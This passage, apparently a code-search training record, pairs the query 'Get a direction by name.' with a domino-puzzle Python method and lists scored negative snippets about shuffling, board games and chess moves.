enumerate(data)] # creates a list of indices\r\n random.shuffle(indexes) # shuffles them\r\n for i in indexes:\r\n yield data[i] # return data in that order\r", "def play_dominoes(draw=draw_init, save_file=None, num_games=1000, save=True):\n list_victories = [0]*(NUM_PLAYERS+1)\n game = Dominoes(NUM_PLAYERS, HAND_SIZE, TOPNUM, save_file=save_file)\n \n # Setups the game. This includes initializing the player instances.\n player1 = RandomDominoPlayer(1, game)\n player2 = RandomDominoPlayer(2, game)\n player3 = RandomDominoPlayer(3, game)\n player4 = RandomDominoPlayer(4, game)\n list_players = (player1, player2, player3, player4)\n game.setup(list_players)\n\n # Play!\n for i in range(num_games):\n # Cleans the game state\n game.reset()\n \n # Draws the starting dominoes.\n starting_dominoes = draw(NUM_PLAYERS, DOMINO, HAND_SIZE)\n# print('\\nStarting_dominoes')\n# print(starting_dominoes[0])\n# print(starting_dominoes[1])\n# print(starting_dominoes[2])\n# print(starting_dominoes[3])\n \n # Assigns the starting dominoes to each player\n for player, dominoes in zip(list_players, starting_dominoes):\n player.reset(start_dominoes=list(dominoes))\n \n # Rolls the game!\n winner = roll_game(game, save=save)\n list_victories[winner] += 1\n if (i*20) % num_games == 0:\n print(i*100/num_games, '% processed.')\n \n# print('Salida:', game.salida)\n \n print('\\n', list_victories, '\\t', list_victories[1]+list_victories[3], \n list_victories[2]+list_victories[4])", "def loop_erased_random_walk(x, y):\n path = []\n directions = []\n\n while not visited[y][x]:\n direction = random.choice(maze.neighbors(x, y))\n nx, ny = maze.neighbor(x, y, direction)\n\n while (nx, ny) in path:\n path.pop()\n directions.pop()\n \n path.append((x, y))\n directions.append(direction)\n x, y = nx, ny\n \n return zip(path, directions)", "def in_random_order(data):\n indexes = [i for i, _ in enumerate(data)] # create a list of indexes\n random.shuffle(indexes) # shuffle them\n for i in indexes:\n yield data[i]", "def fill_space(self, x, y, random, matches_allowed):\n rotation = random.randint(0, 3) * 90\n for _ in range(4):\n try:\n choices = self.choose_and_flip_extra_dominoes(\n random)\n for domino, is_flipped in choices:\n if self.cycles_remaining <= 0:\n return False\n self.cycles_remaining -= 1\n domino.rotate_to(rotation)\n self.add(domino, x, y)\n self.add_count += 1\n has_even_gaps = self.hasEvenGaps()\n if not has_even_gaps:\n self.remove(domino)\n break\n else:\n if is_flipped:\n domino.flip()\n if not matches_allowed and domino.hasMatch():\n pass\n else:\n if self.fill(random,\n matches_allowed,\n reset_cycles=False):\n return True\n self.remove(domino)\n except BadPositionError:\n pass\n rotation = (rotation + 90) % 360\n return False", "def random_iterator(self, batch_size):\n all_indices = np.nonzero(np.logical_not(self._dones))[0]\n np.random.shuffle(all_indices)\n\n states = np.asarray(self._states)\n actions = np.asarray(self._actions)\n next_states = np.asarray(self._next_states)\n rewards = np.asarray(self._rewards)\n dones = np.asarray(self._dones)\n\n i = 0\n while i < len(all_indices):\n indices = all_indices[i:i+batch_size]\n\n yield states[indices], actions[indices], next_states[indices], rewards[indices], dones[indices]\n\n i += batch_size", "def iter_dist(self):\n self.makeTree()\n coords = self.coords\n sd = selfdistance\n for i in self.loopindices:\n dists, inds = self.nntree.query(coords[i], self.nnmaxcount,\n distance_upper_bound=self.nncutoff)\n yield coords[i], dists.compress((dists > sd) & ~np.isinf(dists))", "def iter_trios(self):\n for row in self._ped_tab.itertuples():\n if row.father == '0':\n continue\n if row.mother == '0':\n continue\n yield (row.sample_id, row.father, row.mother)", "def get_examples():\n symbols = get_symbols()\n symbol_start_indices, total_examples = _index_symbols(symbols)\n selection_order = np.arange(total_examples)\n np.random.shuffle(selection_order)\n for sample_index in selection_order:\n # use a binary search to determine which symbol to use given the sample_index\n start_index_index = bisect.bisect_left(symbol_start_indices, sample_index + 1) - 1\n start_index = symbol_start_indices[start_index_index]\n offset = sample_index - start_index\n symbol = symbols[start_index_index]\n time_series_data = get_time_series_data(symbol)\n next_day = time_series_data[offset]\n previous_days = time_series_data[offset + 1: offset + 1 + EXAMPLE_SIZE]\n previous_days.reverse()\n metadata = get_metadata_for_symbol(symbol)\n yield previous_days, next_day, metadata", "def __iter_test_indices(self, n_samples):\n if self.shuffle:\n np.random.seed(self.random_state)\n indices = np.random.permutation(n_samples)\n else:\n indices = np.arange(n_samples)\n\n fold_sizes = np.full(\n self.n_splits, n_samples // self.n_splits, dtype=int\n )\n fold_sizes[: n_samples % self.n_splits] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n mask = np.zeros(n_samples, dtype=bool)\n mask[indices[start:stop]] = True\n yield mask\n current = stop", "def in_random_order(data):\n indexes = [i for i, _ in enumerate(data)]\n random.shuffle(indexes)\n\n for i in indexes:\n yield data[i]", "def shuffleSites(myList):\n shuffle(myList)\n ctr = 0\n for x in myList:\n ctr += 1\n yield ctr, x", "def _all_donors(self, include_background=True):\n sheets = self.shortcut_sheets\n if not include_background:\n sheets = filter(is_not_background, sheets)\n for sheet in sheets:\n for entity in sheet.bio_entities.values():\n yield entity", "def in_random_order(data):\n idx = [i for i, _ in enumerate(data)]\n random.shuffle(idx)\n for i in idx:\n yield data[i]", "def randomDays(self):\n flag = False\n while not flag:\n r = np.floor(np.random.rand() * len(self.df.index))\n start = self.df.index[r]\n if r+self.daysHeld < len(self.df.index)-1:\n end = self.df.index[r+self.daysHeld]\n flag = True\n return (start,end)", "def random(self):\n adj = self.adjacent()\n self.switch(random.choice([pos for pos in adj if self.in_grid(pos) and pos != self.prev]))", "def _next_generation(self, ranks):\n replace = ranks[:int(self.population_size * self.culling)]\n for idx in replace:\n self.population[idx] = self._create_offspring()", "def pushDominoes(self, dominoes):\n if len(dominoes) < 2:\n return dominoes\n\n state = dominoes\n while True:\n next_state = self.domino_fall(state)\n if next_state == state:\n break\n state = next_state\n return state", "def _get_flips(self, origin, direction, color):\n #initialize variables\n flips = [origin]\n\n for x, y in OthelloBoard._increment_move(origin, direction, self.n):\n #print(x,y)\n if self[x][y] == 0:\n return []\n if self[x][y] == -color:\n flips.append((x, y))\n elif self[x][y] == color and len(flips) > 0:\n #print(flips)\n return flips\n\n return []", "def build_matches(self, noise=0):\n for player1_index in range(len(self.players)):\n for player2_index in range(player1_index, len(self.players)):\n pair = (\n self.players[player1_index], self.opponents[player2_index])\n match = self.build_single_match(pair, noise)\n yield (player1_index, player2_index), match", "def flip():\n return random.choice((True, False))", "def test_generator_method(self):\n for i in range(0, 4):\n yield self.try_odd, i", "def with_coordinates(self):\n for tweet in self.having(coordinates=self.default_coordinates):\n yield tweet", "def __iter__(self):\n return iter(self.use_random_var(Rotor, self.is_random, self.attribute_dict))", "def generate_moves(self, board: Board) -> typing.Iterator[MoveDescription]:\n dominoes = set(board.dominoes)\n for domino in dominoes:\n dx, dy = domino.direction\n yield from self.try_move(domino, dx, dy)\n yield from self.try_move(domino, -dx, -dy)" ]
[ "0.7208414", "0.5903002", "0.5236969", "0.47793296", "0.4773952", "0.47145683", "0.46093652", "0.4590172", "0.45812768", "0.45804274", "0.45732227", "0.45460996", "0.4520758", "0.4515188", "0.44946986", "0.4483429", "0.44739068", "0.446823", "0.4457632", "0.44459644", "0.44172007", "0.44098523", "0.44016644", "0.43887493", "0.4369217", "0.4361114", "0.4327133", "0.43211195", "0.43160895", "0.4309812" ]
0.8199502
0
Get a direction by name.
def get_direction(self, name): index = Domino.direction_names.find(name) return Domino.directions[index]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def match_direction(self, string):\r\n return Direction.query(\r\n or_(Direction.name == string, Direction.short_name == string)\r\n ).first()", "def getDirection(self, direction: str):\n return direction", "def get_direction(self, start_direction, **kwargs):\n return self.directions.get(start_direction)", "def get_by_name(self, name):\n return self.by_name.get(name.upper())", "def get(self, name, _marker=None):\n return self._forward.get(name.lower(), _marker)", "def getDirection (self, time):\n return self._response.getDirection(time)", "def get_direction(self, start_direction):\n if not self.directions:\n neighbors = self.get_linked_neighbors()\n\n if len(neighbors) != 1:\n raise MapParserError(\"must have exactly one link connected to it.\", self)\n direction, link = next(iter(neighbors.items()))\n if hasattr(link, \"node_index\"):\n raise MapParserError(\n \"can only connect to a Link. Found {link} in direction {direction}.\", self\n )\n # the string 'teleport' will not be understood by the traverser, leading to\n # this being interpreted as an empty target and the `at_empty_target`\n # hook firing when trying to traverse this link.\n direction_name = self.direction_name\n if start_direction == direction_name:\n # called while traversing another teleport\n # - we must make sure we can always access/leave the teleport.\n self.directions = {direction_name: direction, direction: direction_name}\n else:\n # called while traversing a normal link\n self.directions = {start_direction: direction_name, direction_name: direction}\n\n return self.directions.get(start_direction)", "def _get_direction(self, action, direction):\n left = [2,3,1,0]\n right = [3,2,0,1]\n if direction == 0:\n new_direction = action\n elif direction == -1:\n new_direction = left[action]\n elif direction == 1:\n new_direction = right[action]\n else:\n raise Exception(\"getDir received an unspecified case\")\n return new_direction", "def get_direction(self):\n return self.direction", "def get_direction(self) -> int: \r\n if time.time() > self.stop_timer:\r\n return Directions.stop\r\n else:\r\n return self.direction", "def get_direction_for_dirtag(dirtag):\n dir = dirtag.find(\"OB\");\n if dir < 0: dir = \"Inbound\"\n else: dir = \"Outbound\"\n\n cur = get_cursor();\n SQLExec(cur,\n \"\"\"Select direction_id from gtfs_directions \n where description=%(dir)s\"\"\",\n {'dir':dir});\n ret = cur.next()[0];\n \n cur.close();\n return ret;", "def getDirection(lang):\n return ('ltr', 'rtl')[languages[lang][DIRECTION]]", "def find_next_room(self, direction):\n name_of_room = getattr(self.current_location, direction)\n return globals()[name_of_room]", "def find_next_room(self, direction):\n name_of_room = getattr(self.current_location, direction)\n return globals()[name_of_room]", "def get_direction(self):\r\n return self.__direction", "def get_direction_to_right(self, direction):\r\n return direction_to_right[direction]", "def direction(self) -> Optional[str]:\n return self._direction", "def tryDirection(d, currentRoom):\n attrib = d + '_to'\n\n # See if the room has the destination attribute\n if hasattr(currentRoom, attrib):\n # If so, return its value (the next room)\n return getattr(currentRoom, attrib)\n\n # Otherwise print an error and stay in the same room\n print(\"Where do you think your going?\")\n\n return currentRoom", "def find_by_name(self, name):\n return self.get(name)", "def compute_direction(self, feats):\n if feats.name == \"ARNC\":\n if feats[\"z-score\"] < -1.5:\n return Directions.long_dir\n elif feats[\"z-score\"] > 1.5:\n return Directions.short_dir\n elif feats.name == \"UNG\":\n if feats[\"z-score\"] < -1.5:\n return Directions.short_dir\n elif feats[\"z-score\"] > 1.5:\n return Directions.long_dir", "def direction(d, current_room):\n key = d + \"_to\"\n\n if key not in rooms[current_room]:\n print(\"You can't go that way.\")\n return current_room\n\n destination = rooms[current_room][key]\n\n return destination", "def get_chase_direction(self, options):\n pick_direction = None\n target_pos = (self.target.rect.centerx, self.target.rect.centery)\n test = (abs(target_pos[0]), abs(target_pos[1]))\n prefer = test.index(max(test[0], test[1]))\n if prefer == 0: # x direction\n if target_pos[prefer] < self.rect.centerx: # to the left\n pick_direction = 'l'\n elif target_pos[prefer] > self.rect.centerx: # to the right\n pick_direction = 'r'\n else: # y direction\n if target_pos[prefer] < self.rect.centery: # upward\n pick_direction = 'u'\n elif target_pos[prefer] > self.rect.centery: # downward\n pick_direction = 'd'\n if pick_direction not in options: # desired direction not available\n if 'u' in options: # pick a direction that is available\n return 'u'\n if 'l' in options:\n return 'l'\n if 'r' in options:\n return 'r'\n if 'd' in options:\n return 'd'\n else: # desired direction available, return it\n return pick_direction", "def get_direction(strategy_context):\n direction_param = strategy_context['strategy']['opt_params'][0]\n\n if 'direction' in strategy_context['strategy']:\n warnings.warn(\"'direction' parameter in strategy_context['strategy']['direction'] is obsolete, \"\n \"please remove it to suppress this warning\")\n\n if direction_param.name.lower() != 'direction':\n raise ValueError('First OptParam of strategy must be Direction')\n\n for dir_value in direction_param.array:\n if dir_value != -1 and dir_value != 1:\n raise ValueError(\"Direction OptParam value must be -1 or 1\")\n\n if len(direction_param.array) == 1:\n if direction_param.array[0] == 1:\n return 1, 'Long'\n elif direction_param.array[0] == -1:\n return -1, 'Short'\n\n elif len(direction_param.array) == 2:\n return 0, 'Bidir'\n else:\n raise ValueError(\"Direction OptParam must contain 1 or 2 elements\")", "def direction(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"direction\")", "def get_room_by_name(name: str, context: 'GameContext') -> Room | None:\n for room in context.rooms:\n if room.name == name:\n return room\n\n # return None # default", "async def direction(self, value) -> str:\n if value is None:\n return \"N\"\n\n direction_array = [\n \"N\",\n \"NNE\",\n \"NE\",\n \"ENE\",\n \"E\",\n \"ESE\",\n \"SE\",\n \"SSE\",\n \"S\",\n \"SSW\",\n \"SW\",\n \"WSW\",\n \"W\",\n \"WNW\",\n \"NW\",\n \"NNW\",\n \"N\",\n ]\n direction_str = direction_array[int((value + 11.25) / 22.5)]\n return self._translations[\"wind_dir\"][direction_str]", "def get_by_name(cls, name):\n return cls.query.filter(cls.name == name).first()", "def isDir(n):\n assert isinstance(n, int) or isinstance(n, str) or isinstance(n, Direction), 'incorrect type of arg n: should be type int, str or Direction, is type {}'.format(type(n))\n dd = n in Direction.directions.keys()\n ds = n in Direction.directions.values()\n return dd or ds or isinstance(n, Direction)", "def lookup_by_name(cls, name):\n return cls.__by_name[name]", "def get_room(self, name):\n for i in self.rooms:\n if self.rooms[i].name == name:\n return self.rooms[i]\n raise RuntimeError, \"Room '%s' not known\" % name" ]
[ "0.65444416", "0.644363", "0.6317267", "0.58342814", "0.5821944", "0.5821525", "0.57715315", "0.57485586", "0.56602365", "0.56146896", "0.56140655", "0.5608703", "0.5557051", "0.5557051", "0.55225646", "0.54623437", "0.54026246", "0.5378701", "0.5376569", "0.5370104", "0.5360129", "0.5360028", "0.5336181", "0.5322964", "0.53166443", "0.5289803", "0.5281358", "0.52687085", "0.52671045", "0.52629435" ]
0.81401694
0
True if either cell matches one of its neighbours. Slightly different type of matching from isMatch().
def hasMatch(self): for cell in (self.head, self.tail): for neighbour in cell.find_neighbours(): if neighbour.pips == cell.pips: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_neighbours(self):\n for p in self.targetCell.possibilities:\n if p != 0:\n if p not in self.targetCell.row_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n elif p not in self.targetCell.column_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n elif p not in self.targetCell.box_neighbour_possibilities:\n self.targetCell.solve(p)\n return True\n return False", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def is_neighbour(self, other, diagonal):\n return other in self.neighbours(diagonal)", "def search_grid(grid1, grid2, i, j):\n if i < 0 or j < 0 or i >= len(grid1) or j >= len(grid1[0]): # boundary check\n return True\n match = grid1[i][j] == grid2[i][j]\n if grid1[i][j] == 0 or grid2[i][j] == 0:\n return match\n # once a cell becomes a part of a matching region, set it to 0. This makes sure that the cell\n # is not counted for another matching region.\n grid1[i][j] = 0\n grid2[i][j] = 0\n match = search_grid(grid1, grid2, i - 1, j) and match\n match = search_grid(grid1, grid2, i, j - 1) and match\n match = search_grid(grid1, grid2, i + 1, j) and match\n match = search_grid(grid1, grid2, i, j + 1) and match\n return match", "def has_neighbor(self, tile: 'games.saloon.tile.Tile') -> bool:\n return bool(tile and tile in self.get_neighbors())", "def exist_adjacent_cell(board: list, cell_index: tuple) -> bool:\n #Each time the result = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\n possible_cells_direction = list(filter(lambda x: x[0] != 0 or x[1] != 0, list(product(range(-1, 2), range(-1, 2)))))\n\n for coord_couple in possible_cells_direction:\n i = cell_index[0] + coord_couple[0]\n j = cell_index[1] + coord_couple[1]\n\n if not test_cell_existence(board, i, j):\n continue\n\n # If a cell isn't empty\n if board[i][j] != 0:\n return True\n return False", "def point_in_ship(ships, coor):\n for ship in ships:\n if coor in ship.coordinates or coor in ship.neighbor:\n return True\n return False", "def main(board, word):\r\n for i, row in enumerate(board):\r\n for j, square in enumerate(row):\r\n if square == word[0]:\r\n res = neighbors(board, word, i, j)\r\n if res:\r\n return True\r\n return False", "def is_adjacent(self, other: ops.Qid) -> bool:\n return (isinstance(other, GridQubit) and\n abs(self.row - other.row) + abs(self.col - other.col) == 1)", "def square2_checker(self, x, y, row2, col2):\n \n self.x = x\n self.y = y\n self.row2 = row2\n self.col2 = col2\n\n return abs(self.x - self.row2) == 1 and self.col2 == self.y \\\n or abs(self.y - self.col2) == 1 and self.row2 == self.x", "def matched_neighbors(coord, second_char, matrix, row_length, column_length):\n row_number, column_number = coord\n neighbors_coordinates = [(row, column) for row in xrange(row_number - 1, row_number + 2)\n for column in xrange(column_number - 1, column_number + 2)\n if row_length > row >= 0 and column_length > column >= 0\n and coord_char((row, column), matrix) == second_char\n and not (row, column) == coord]\n\n return neighbors_coordinates", "def is_adjacent(v1, v2):\n return (v2 in _board_graph[v1])", "def __eq__(self, other):\n try:\n return self.row == other.row and self.col == other.col\n except AttributeError: # Can also take a tuple (row, col)\n return self.row == other[0] and self.col == other[1]", "def is_cell_on_board(cell, board_shape): # TODO: Remove\n return (0, 0) <= cell < board_shape", "def __eq__(self, other):\n\n return(self.cell == other.cell and\n self._lastUsedIteration == other._lastUsedIteration and\n (sorted(self.__synapses, key=lambda x: x._ordinal) ==\n sorted(other.__synapses, key=lambda x: x._ordinal)))", "def is_match(cells):\n if len(cells) == 1 and \"-\" not in cells:\n return list(cells)[0]\n return None", "def point_in_between(ob, row, cell, other_cell):\n if row:\n left = other_cell[0] < cell[0]\n if left:\n return ob.patt[0] == 1\n else:\n return ob.patt[2] == 1\n below = other_cell[1] < cell[1]\n if below:\n return ob.patt[1] == 0\n else:\n return ob.patt[1] == 2", "def test_cell_existence(board: list, i: int, j: int) -> bool:\n return not (i < 0 or i > len(board)-1 or j < 0 or j > len(board)-1)", "def isIn(self, coor, rec):\n x, y = coor[0], coor[1]\n top, bottom, left, right = rec[1][1], rec[0][1], rec[0][0], rec[1][0]\n # print(top, bottom, left, right)\n if left <= x <= right and bottom <= y <= top:\n return True\n else:\n return False", "def __eq__(self, other):\n return other and self.cells == other.cells", "def any_possible_moves(grid):\n if get_empty_cells(grid):\n return True\n for row in grid:\n if any(row[i]==row[i+1] for i in range(len(row)-1)):\n return True\n for i,val in enumerate(grid[0]):\n column = get_column(grid, i)\n if any(column[i]==column[i+1] for i in range(len(column)-1)):\n return True\n return False", "def _intersectionmatch(min_coord_im,max_coord_im,min_coord_zip,max_coord_zip):\n return min_coord_im < max_coord_zip and max_coord_im > min_coord_zip", "def has_connection_right(tile):\n return is_kth_bit_set(tile, 3)", "def edge_between_neighbors(cell_a, cell_b):\n edge = np.logical_and(dilate_simple(cell_a), dilate_simple(cell_b))\n return edge", "def any_possible_moves(grid):\n\tif get_empty_cells(grid):\n\t\treturn True\n\tfor row in grid:\n\t\tif any(row[i]==row[i+1] for i in range(len(row)-1)):\n\t\t\treturn True\n\tfor i,val in enumerate(grid[0]):\n\t\tcolumn = get_column(grid, i)\n\t\tif any(column[i]==column[i+1] for i in range(len(column)-1)):\n\t\t\treturn True\n\treturn False", "def matches(self, other):\n return ( all([i==j or i<0 or j<0 for i, j in zip(self._data, other._data)])\n and len(self._data) == len(other._data) )", "def fn(i):\n for j in range(n):\n if grid[i][j] and not seen[j]: \n seen[j] = True\n if match[j] == -1 or fn(match[j]): \n match[j] = i\n return True \n return False", "def neighboursContains(board, row, column, piece):\n\n neighboursList = []\n for rowIndex, columnIndex in BoardUtils.DIRECTIONS.values():\n if 0 <= row + rowIndex < len(board) and 0 <= column + columnIndex < len(board[0]):\n neighboursList.append((row + rowIndex, column + columnIndex))\n\n for rowIndex, columnIndex in neighboursList:\n if board[rowIndex][columnIndex] == piece:\n return True\n return False", "def findRep(self, rep, cell = 1):\n\n if type(rep) == list: rep = np.array(rep)\n print(rep)\n if cell == 1:\n match = np.all(np.all(self.rep_1 == rep, axis = 2), axis = 1)\n elif cell == 2:\n match = np.all(np.all(self.rep_2 == rep, axis = 2), axis = 1) \n\n return match", "def _cell_in_boundary(self, i_row, i_col):\n return ((i_row, i_col) == self._tl_cell or\n (i_row, i_col) == self._tr_cell or\n (i_row, i_col) == self._bl_cell or\n (i_row, i_col) == self._br_cell or\n (i_row, i_col) in self._ls_cells or\n (i_row, i_col) in self._rs_cells or\n (i_row, i_col) in self._ts_cells or\n (i_row, i_col) in self._bs_cells)" ]
[ "0.6724939", "0.65565187", "0.651675", "0.6491993", "0.64436924", "0.64371634", "0.64162314", "0.64157915", "0.64040434", "0.64029574", "0.6330807", "0.6311212", "0.62970114", "0.625364", "0.6251876", "0.62480813", "0.6242117", "0.62384665", "0.6207678", "0.6207055", "0.6169609", "0.61415184", "0.6140069", "0.61275786", "0.6115166", "0.6114095", "0.61119616", "0.61097664", "0.6094244", "0.60871965" ]
0.7738691
0
Move a domino and calculate the new board state. Afterward, put the board back in its original state.
def move(self, domino, dx, dy) -> typing.Tuple[str, int]: domino.move(dx, dy) try: board = domino.head.board if not board.is_connected(): raise BadPositionError('Board is not connected.') if board.has_loner(): raise BadPositionError('Board has a lonely domino.') remaining = self.check_progress(board) return board.display(cropped=True), remaining finally: domino.move(-dx, -dy)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def move(self, domino, dx, dy, offset=None):\n matching_dominoes = set()\n complement_found = False\n domino.move(dx, dy)\n board = domino.head.board\n try:\n if not board.is_connected():\n raise BadPositionError('Board is not connected after move.')\n for cell in (domino.head, domino.tail):\n for neighbour in cell.find_neighbours():\n if neighbour.pips == cell.pips:\n matching_dominoes.add((neighbour.domino,\n neighbour.domino.head.x,\n neighbour.domino.head.y))\n complement_found = (complement_found or\n neighbour.pips + cell.pips == 6)\n if matching_dominoes:\n matching_dominoes.add((domino, domino.head.x, domino.head.y))\n elif not complement_found:\n raise BadPositionError(\n 'A legal move must have captures or complements.')\n for matching_domino, _, _ in matching_dominoes:\n board.remove(matching_domino)\n if not board.is_connected():\n raise BadPositionError('Board is not connected after capture.')\n cropping_bounds = [] if offset is not None else None\n new_state = board.display(cropped=True,\n cropping_bounds=cropping_bounds)\n remaining = self.check_progress(board)\n if offset is not None:\n offset[0] -= cropping_bounds[0]\n offset[1] -= cropping_bounds[1]\n return new_state, remaining\n finally:\n for matching_domino, x, y in matching_dominoes:\n board.add(matching_domino, x, y)\n domino.move(-dx, -dy)", "def move(self, board):\n raise NotImplementedError", "def move(self, board):\n # first, make your turn:\n currentState = board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def domove(self, depart, arrivee, promote):\n\n # Debugging tests\n # if(self.cases[depart].isEmpty()):\n # print('domove() ERROR : asked for an empty square move : ',depart,arrivee,promote)\n # return \n # if(int(depart)<0 or int(depart)>63):\n # print('domove() ERROR : incorrect FROM square number : ',depart)\n # return \n # if(int(arrivee)<0 or int(arrivee)>63):\n # print('domove() ERROR : incorrect TO square number : ',arrivee)\n # return\n # if(not(promote=='' or promote=='q' or promote=='r' or promote=='n' or promote=='b')):\n # print('domove() ERROR : incorrect promote : ',promote)\n # return\n\n # Informations to save in the history moves\n pieceDeplacee = self.cases[depart] # moved piece\n piecePrise = self.cases[arrivee] # taken piece, can be null : Piece()\n isEp = False # will be used to undo a ep move\n histEp = self.ep # saving the actual ep square (-1 or square number TO)\n hist_roque_56 = self.white_can_castle_56\n hist_roque_63 = self.white_can_castle_63\n hist_roque_0 = self.black_can_castle_0\n hist_roque_7 = self.black_can_castle_7\n flagViderEp = True # flag to erase ep or not : if the pawn moved is not taken directly, it can't be taken later\n\n # Moving piece\n self.cases[arrivee] = self.cases[depart]\n self.cases[depart] = Piece()\n\n self.ply += 1\n\n # a PAWN has been moved -------------------------------------\n if (pieceDeplacee.nom == 'PION'):\n\n # White PAWN\n if (pieceDeplacee.couleur == 'blanc'):\n\n # If the move is \"en passant\"\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee + 8] # take black pawn\n self.cases[arrivee + 8] = Piece()\n isEp = True\n\n # The white pawn moves 2 squares from starting square\n # then blacks can take \"en passant\" next move\n elif (self.ROW(depart) == 6 and self.ROW(arrivee) == 4):\n self.ep = arrivee + 8\n flagViderEp = False\n\n # Black PAWN\n else:\n\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee - 8]\n self.cases[arrivee - 8] = Piece()\n isEp = True\n\n elif (self.ROW(depart) == 1 and self.ROW(arrivee) == 3):\n self.ep = arrivee - 8\n flagViderEp = False\n\n # a ROOK has been moved--------------------------------------\n # update castle rights\n\n elif (pieceDeplacee.nom == 'TOUR'):\n\n # White ROOK\n if (pieceDeplacee.couleur == 'blanc'):\n if (depart == 56):\n self.white_can_castle_56 = False\n elif (depart == 63):\n self.white_can_castle_63 = False\n\n # Black ROOK\n else:\n if (depart == 0):\n self.black_can_castle_0 = False\n elif (depart == 7):\n self.black_can_castle_7 = False\n\n # a KING has been moved-----------------------------------------\n\n elif (pieceDeplacee.nom == 'ROI'):\n\n # White KING\n if (pieceDeplacee.couleur == 'blanc'):\n\n # moving from starting square\n if (depart == 60):\n # update castle rights\n self.white_can_castle_56 = False\n self.white_can_castle_63 = False\n\n # If castling, move the rook\n if (arrivee == 58):\n self.cases[56] = Piece()\n self.cases[59] = Piece('TOUR', 'blanc')\n\n elif (arrivee == 62):\n self.cases[63] = Piece()\n self.cases[61] = Piece('TOUR', 'blanc')\n\n # Black KING\n else:\n\n if (depart == 4):\n self.black_can_castle_0 = False\n self.black_can_castle_7 = False\n\n if (arrivee == 6):\n self.cases[7] = Piece()\n self.cases[5] = Piece('TOUR', 'noir')\n\n elif (arrivee == 2):\n self.cases[0] = Piece()\n self.cases[3] = Piece('TOUR', 'noir')\n\n # End pieces cases-----------------------------------------------\n\n # Any move cancels the ep move\n if (flagViderEp == True):\n self.ep = -1\n\n # Promote : the pawn is changed to requested piece\n if (promote != ''):\n if (promote == 'q'):\n self.cases[arrivee] = Piece('DAME', self.side2move)\n elif (promote == 'r'):\n self.cases[arrivee] = Piece('TOUR', self.side2move)\n elif (promote == 'n'):\n self.cases[arrivee] = Piece('CAVALIER', self.side2move)\n elif (promote == 'b'):\n self.cases[arrivee] = Piece('FOU', self.side2move)\n\n # Change side to move\n self.changeTrait()\n\n # Save move to the history list\n self.history.append((depart, \\\n arrivee, \\\n pieceDeplacee, \\\n piecePrise, \\\n isEp, \\\n histEp, \\\n promote, \\\n hist_roque_56, \\\n hist_roque_63, \\\n hist_roque_0, \\\n hist_roque_7))\n\n # If the move lets king in check, undo it and return false\n if (self.in_check(self.oppColor(self.side2move))):\n self.undomove()\n return False\n\n return True", "def make_move(self, move, player, board):\r\n #nBoard = board.copy()\r\n board[move] = player\r\n for d in core.DIRECTIONS:\r\n if self.find_bracket(move, player, board, d)!=None:\r\n self.make_flips(move, player, board, d)\r\n return board", "def moved_board(board):\n return legal_move_on(board=board).map(\n lambda (start, end): board.move(start=start, end=end),\n )", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def apply_move(self, move):\r\n next_board = copy.deepcopy(self.board)\r\n next_board.place(self.next_player, move)\r\n return GameState(next_board, self.next_player.other, move)", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif 